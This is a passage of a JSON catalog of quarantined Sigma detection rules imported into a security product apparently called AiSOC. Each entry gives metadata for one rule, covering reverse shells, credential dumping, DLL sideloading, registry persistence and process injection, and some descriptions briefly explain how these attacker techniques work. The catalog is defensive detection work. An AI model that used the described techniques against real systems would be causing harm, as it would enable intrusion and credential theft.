executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "72af37e2-ec32-47dc-992b-bc288a2708cb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_new_cloudshell_created.yml" } }, { "id": "sigmahq-sigma-72ca7c75-bf85-45cd-aca7-255d360e423c", "type": "detection", "name": "Potential Chrome Frame Helper DLL Sideloading", "description": "Detects potential DLL sideloading of \"chrome_frame_helper.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-chrome-frame-helper-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "72ca7c75-bf85-45cd-aca7-255d360e423c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_chrome_frame_helper.yml" } }, { "id": "sigmahq-sigma-72cd00d6-490c-4650-86ff-1d11f491daa1", "type": "detection", "name": "Vulnerable Driver Load By Name", "description": "Detects the load of known vulnerable drivers via the file name of the drivers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1543.003", "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vulnerable-driver-load-by-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "72cd00d6-490c-4650-86ff-1d11f491daa1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/driver_load/driver_load_win_vuln_drivers_names.yml" } }, { "id": "sigmahq-sigma-72f4ab3f-787d-495d-a55d-68c2ff46cf4c", "type": "detection", "name": "Connection Proxy", "description": "Detects setting proxy configuration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/connection-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "72f4ab3f-787d-495d-a55d-68c2ff46cf4c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml" } }, { "id": "sigmahq-sigma-730fc21b-eaff-474b-ad23-90fd265d4988", "type": "detection", "name": "Psexec Execution", "description": "Detects user accept agreement execution in psexec commandline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569", "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/psexec-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "730fc21b-eaff-474b-ad23-90fd265d4988", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_psexec_execution.yml" } }, { "id": "sigmahq-sigma-731231b9-0b5d-4219-94dd-abb6959aa7ea", "type": "detection", "name": "Suspicious Rundll32 Activity Invoking Sys File", "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-rundll32-activity-invoking-sys-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_sys.yml" } }, { "id": "sigmahq-sigma-734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", "type": "detection", "name": "Remote PowerShell Session Host Process (WinRM)", "description": "Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-powershell-session-host-process-winrm.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_winrm_remote_powershell_session_process.yml" } }, { "id": "sigmahq-sigma-736ffa74-5f6f-44ca-94ef-1c0df4f51d2a", "type": "detection", "name": "HackTool - CrackMapExec File Indicators", "description": "Detects file creation events with filename patterns used by CrackMapExec.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-crackmapexec-file-indicators.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "736ffa74-5f6f-44ca-94ef-1c0df4f51d2a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_hktl_crackmapexec_indicators.yml" } }, { "id": "sigmahq-sigma-737e618a-a410-49b5-bec3-9e55ff7fbc15", "type": "detection", "name": "Suspicious Calculator Usage", "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-calculator-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_calc_uncommon_exec.yml" } }, { "id": "sigmahq-sigma-738d9bcf-6999-4fdb-b4ac-3033037db8ab", "type": "detection", "name": "Suspicious Reverse Shell Command Line", "description": "Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-reverse-shell-command-line.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "738d9bcf-6999-4fdb-b4ac-3033037db8ab", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_shell_susp_rev_shells.yml" } }, { "id": "sigmahq-sigma-73921b9c-cafd-4446-b0c6-fdb0ace42bc0", "type": "detection", "name": "Windows Credential Guard Disabled - Registry", "description": "Detects attempts to disable Windows Credential Guard by setting registry values to 0. Credential Guard uses virtualization-based security to isolate secrets so that only privileged system software can access them.\nAdversaries may disable Credential Guard to gain access to sensitive credentials stored in the system, such as NTLM hashes and Kerberos tickets, which can be used for lateral movement and privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-credential-guard-disabled-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "73921b9c-cafd-4446-b0c6-fdb0ace42bc0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_credential_guard_disabled.yml" } }, { "id": "sigmahq-sigma-73a883d0-0348-4be4-a8d8-51031c2564f8", "type": "detection", "name": "Potential Registry Persistence Attempt Via Windows Telemetry", "description": "Detects potential persistence behavior using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-registry-persistence-attempt-via-windows-telemetry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "73a883d0-0348-4be4-a8d8-51031c2564f8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_telemetry_persistence.yml" } }, { "id": "sigmahq-sigma-73bba97f-a82d-42ce-b315-9182e76c57b1", "type": "detection", "name": "Imports Registry Key From a File", "description": "Detects the import of the specified file to the registry with regedit.exe.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/imports-registry-key-from-a-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "73bba97f-a82d-42ce-b315-9182e76c57b1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml" } }, { "id": "sigmahq-sigma-73e67340-0d25-11eb-adc1-0242ac120002", "type": "detection", "name": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-clip-launcher-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "73e67340-0d25-11eb-adc1-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_clip.yml" } }, { "id": "sigmahq-sigma-74176142-4684-4d8a-8b0a-713257e7df8e", "type": "detection", "name": "Potential Active Directory Enumeration Using AD Module - PsModule", "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-active-directory-enumeration-using-ad-module-psmodule.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "74176142-4684-4d8a-8b0a-713257e7df8e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml" } }, { "id": "sigmahq-sigma-74298991-9fc4-460e-a92e-511aa60baec1", "type": "detection", "name": "Added Owner To Application", "description": "Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/added-owner-to-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "74298991-9fc4-460e-a92e-511aa60baec1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_app_owner_added.yml" } }, { "id": "sigmahq-sigma-74403157-20f5-415d-89a7-c505779585cf", "type": "detection", "name": "ConvertTo-SecureString Cmdlet Usage Via CommandLine", "description": "Detects usage of the \"ConvertTo-SecureString\" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/convertto-securestring-cmdlet-usage-via-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "74403157-20f5-415d-89a7-c505779585cf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml" } }, { "id": "sigmahq-sigma-744a188b-0415-4792-896f-11ddb0588dbc", "type": "detection", "name": "Potential Process Injection Via Msra.EXE", "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-process-injection-via-msra-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "744a188b-0415-4792-896f-11ddb0588dbc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msra_process_injection.yml" } }, { "id": "sigmahq-sigma-746c86fb-ccda-4816-8997-01386263acc4", "type": "detection", "name": "Container Residence Discovery Via Proc Virtual FS", "description": "Detects potential container discovery via listing of certain kernel features in the \"/proc\" virtual filesystem", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/container-residence-discovery-via-proc-virtual-fs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "746c86fb-ccda-4816-8997-01386263acc4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_container_residence_discovery.yml" } }, { "id": "sigmahq-sigma-749c9f5e-b353-4b90-a9c1-05243357ca4b", "type": "detection", "name": "Potential Privilege Escalation via Local Kerberos Relay over LDAP", "description": "Detects a suspicious local successful logon event where the Logon Package is Kerberos, the remote address is set to localhost, and the target user SID is the built-in local Administrator account.\nThis may indicate an attempt to leverage a Kerberos relay attack variant that can be used to elevate privilege locally from a domain joined limited user to local System privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-privilege-escalation-via-local-kerberos-relay-over-ldap.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_susp_privesc_kerberos_relay_over_ldap.yml" } }, { "id": "sigmahq-sigma-74a12f18-505c-4114-8d0b-8448dd5485c6", "type": "detection", "name": "PUA - Nimgrab Execution", "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-nimgrab-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "74a12f18-505c-4114-8d0b-8448dd5485c6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_nimgrab.yml" } }, { "id": "sigmahq-sigma-74a2b202-73e0-4693-9a3a-9d36146d0775", "type": "detection", "name": "Remote Access Tool - MeshAgent Command Execution via MeshCentral", "description": "Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly.\nMeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-meshagent-command-execution-via-meshcentral.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "74a2b202-73e0-4693-9a3a-9d36146d0775", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_meshagent_exec.yml" } }, { "id": "sigmahq-sigma-74a2b37d-fea4-41e0-9ac7-c9fbcf1f60cc", "type": "detection", "name": "WinRAR Creating Files in Startup Locations", "description": "Detects WinRAR creating files in Windows startup locations, which may indicate an attempt to establish persistence by adding malicious files to the Startup folder.\nThis kind of behaviour has been associated with exploitation of WinRAR path traversal vulnerability CVE-2025-6218 or CVE-2025-8088.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/winrar-creating-files-in-startup-locations.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "74a2b37d-fea4-41e0-9ac7-c9fbcf1f60cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_winrar_file_creation_in_startup_folder.yml" } }, { "id": "sigmahq-sigma-74babdd6-a758-4549-9632-26535279e654", "type": "detection", "name": "Suspicious Executable File Creation", "description": "Detect creation of suspicious executable file names.\nSome strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-executable-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "74babdd6-a758-4549-9632-26535279e654", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_executable_creation.yml" } }, { "id": "sigmahq-sigma-74c01ace-0152-4094-8ae2-6fd776dd43e5", "type": "detection", "name": "File or Folder Permissions Change", "description": "Detects file and folder permission changes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1222.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-or-folder-permissions-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "74c01ace-0152-4094-8ae2-6fd776dd43e5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_file_or_folder_permissions.yml" } }, { "id": "sigmahq-sigma-75180c5f-4ea1-461a-a4f6-6e4700c065d4", "type": "detection", "name": "Windows Recall Feature Enabled - Registry", "description": "Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of \"DisableAIDataAnalysis\" to \"0\".\nAdversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.\nThis rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1113" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-recall-feature-enabled-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "75180c5f-4ea1-461a-a4f6-6e4700c065d4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_enable_windows_recall.yml" } }, { "id": "sigmahq-sigma-7530b96f-ad8e-431d-a04d-ac85cc461fdc", "type": "detection", "name": "Custom File Open Handler Executes PowerShell", "description": "Detects the abuse of custom file open handler, executing powershell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/custom-file-open-handler-executes-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_custom_file_open_handler_powershell_execution.yml" } }, { "id": "sigmahq-sigma-7530cd3d-7671-43e3-b209-976966f6ea48", "type": "detection", "name": "Renamed CURL.EXE Execution", "description": "Detects the execution of a renamed \"CURL.exe\" binary based on the PE metadata fields", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-curl-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7530cd3d-7671-43e3-b209-976966f6ea48", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_curl.yml" } }, { "id": "sigmahq-sigma-754ed792-634f-40ae-b3bc-e0448d33f695", "type": "detection", "name": "Suspicious PowerShell Parent Process", "description": "Detects a suspicious or uncommon parent processes of PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-parent-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "754ed792-634f-40ae-b3bc-e0448d33f695", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_susp_parent_process.yml" } }, { "id": "sigmahq-sigma-758ff488-18d5-4cbe-8ec4-02b6285a434f", "type": "detection", "name": "Remote Access Tool - NetSupport Execution", "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-netsupport-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "758ff488-18d5-4cbe-8ec4-02b6285a434f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_netsupport.yml" } }, { "id": "sigmahq-sigma-7595ba94-cf3b-4471-aa03-4f6baa9e5fad", "type": "detection", "name": "Important Scheduled Task Deleted/Disabled", "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/important-scheduled-task-deleted-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 